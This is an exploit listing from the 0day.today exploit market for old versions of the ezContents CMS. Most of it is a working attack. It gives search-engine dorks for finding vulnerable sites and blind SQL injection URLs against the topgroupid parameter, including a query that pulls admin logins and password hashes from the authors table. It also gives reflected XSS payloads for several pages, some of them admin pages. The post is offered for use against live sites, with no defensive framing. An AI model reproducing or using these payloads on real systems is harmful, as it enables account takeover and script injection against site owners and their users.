[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ezContents (1.x.x , 2.0.3) Blind injection/Reflected XSS Vulnerabilties

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18337
Category
web applications
Date add
23-05-2012
Platform
php
ezContents (1.x.x , 2.0.3) Blind injection/Reflected XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ezcontents.org/

#######################################################################

===[ Exploit ]===
1.x.x
======
Version: 1.4.1 , 1.4.2 , 1.4.5

Dork: inurl:"index.php?topgroupid=" "Powered by ezContents"

Blind Injection
================

http://SITE/index.php?topgroupid=1[Blind Injection]  

http://SITE/index.php?topgroupid=1'       Change Page!!

http://SITE/index.php?topgroupid=1+and+1=1    True
http://SITE/index.php?topgroupid=1+and+1=2    False

http://SITE/index.php?topgroupid=1+and+substring(@@version,1,1)=5   True
http://SITE/index.php?topgroupid=1+and+substring(@@version,1,1)=4   False

To Get Admin Account:

http://SITE/index.php?topgroupid=1+and+(select substring(concat(1,concat(authorid,0x3a,login,0x3a,password)),1,1) from ezc_authors limit 0,1)=1

WEBSITE LOGIN: http://SITE/admin/


REflected XSS
==============

http://SITE/index.php?link=modules/search/search.php&topgroupid='"--></style></script><script>alert(1337)</script>


2.0.3
======

Dork : "Powered by ezContents 2.0.3"

Multiple REflected XSS
=======================

http://SITE/topmenu.php?=3&topgroupname='"--></style></script><script>alert(1337)</script>
http://SITE/admin/datepicker.php?=3&control='"--></style></script><script>alert(1337)</script>
http://SITE/admin/tagpicker2.php?=3&control='"--></style></script><script>alert(1337)</script>
http://SITE/admin/imagepicker.php?=3&control='"--></style></script><script>alert(1337)</script>

#######################################################################



#  0day.today [2024-12-25]  #